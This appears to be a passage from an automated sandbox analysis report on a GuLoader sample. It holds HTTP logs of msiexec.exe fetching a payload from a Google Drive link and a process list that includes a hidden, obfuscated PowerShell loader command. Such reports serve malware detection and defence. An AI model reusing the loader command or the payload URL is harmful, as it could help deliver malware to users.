                                                                        Content-Security-Policy: script-src 'nonce-mE0d6xhnKeeJk3E3M0ASRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:47:38 UTC1534INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 48 7a 6c 62 51 71 69 5a 78 4b 35 74 6b 56 68 30 59 51 65 4c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8HzlbQqiZxK5tkVh0YQeLQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                        2025-03-07 21:47:38 UTC118INData Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                        Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.449738216.58.206.784436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:41 UTC428OUTGET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:43 UTC1610INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:42 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Content-Security-Policy: script-src 'nonce-CYkNgdt7uB_n2mQwfcZCiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.449739142.250.185.1934436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:45 UTC470OUTGET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Cache-Control: no-cache
                                                                        Host: drive.usercontent.google.com
                                                                        Connection: Keep-Alive
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:46 UTC1534INHTTP/1.1 404 Not Found
                                                                        X-GUploader-UploadID: AKDAyIv15-NRjJR3BIyRs6pF_7U5SaxGjedX1GDvVZU7YiFslTeq-Fc3E03O_CYZJAQUhVhC
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:46 GMT
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Content-Security-Policy: script-src 'nonce-9P5cL0hea1LIuPxPmtfhnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Content-Length: 1652
                                                                        Server: UploadServer
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                        Connection: close
                                                                        2025-03-07 21:47:46 UTC1534INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 4c 35 56 6c 78 67 39 58 35 6a 64 34 34 37 4c 74 74 6c 31 5a 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6L5Vlxg9X5jd447Lttl1ZA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                        2025-03-07 21:47:46 UTC118INData Raw: 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                        Data Ascii: ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.449740216.58.206.784436128C:\Windows\SysWOW64\msiexec.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-03-07 21:47:48 UTC428OUTGET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                                                        Host: drive.google.com
                                                                        Cache-Control: no-cache
                                                                        Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
                                                                        2025-03-07 21:47:49 UTC1610INHTTP/1.1 303 See Other
                                                                        Content-Type: application/binary
                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                        Pragma: no-cache
                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                        Date: Fri, 07 Mar 2025 21:47:49 GMT
                                                                        Location: https://drive.usercontent.google.com/download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                        Content-Security-Policy: script-src 'nonce-b95Ej6AElYJtRqkn6bdiDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                        Server: ESF
                                                                        Content-Length: 0
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        X-Content-Type-Options: nosniff
                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                        Connection: close


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:16:45:43
                                                                        Start date:07/03/2025
                                                                        Path:C:\Users\user\Desktop\GyGE2VaBFL.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\GyGE2VaBFL.exe"
                                                                        Imagebase:0x400000
                                                                        File size:791'053 bytes
                                                                        MD5 hash:D8EACF83CA07943696BF5E23528CC348
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:1
                                                                        Start time:16:45:45
                                                                        Start date:07/03/2025
                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) "
                                                                        Imagebase:0xb80000
                                                                        File size:433'152 bytes
                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1676887865.000000000ACA8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:2
                                                                        Start time:16:45:45
                                                                        Start date:07/03/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff62fc20000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:16:45:47
                                                                        Start date:07/03/2025
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                        Imagebase:0x7ff6ca680000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:10
                                                                        Start time:16:46:33
                                                                        Start date:07/03/2025
                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                        Imagebase:0xcc0000
                                                                        File size:59'904 bytes
                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000002.2415295376.0000000005518000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >